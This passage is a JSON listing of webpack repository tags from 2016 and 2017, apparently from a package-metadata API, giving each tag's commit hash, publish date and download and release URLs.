:null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw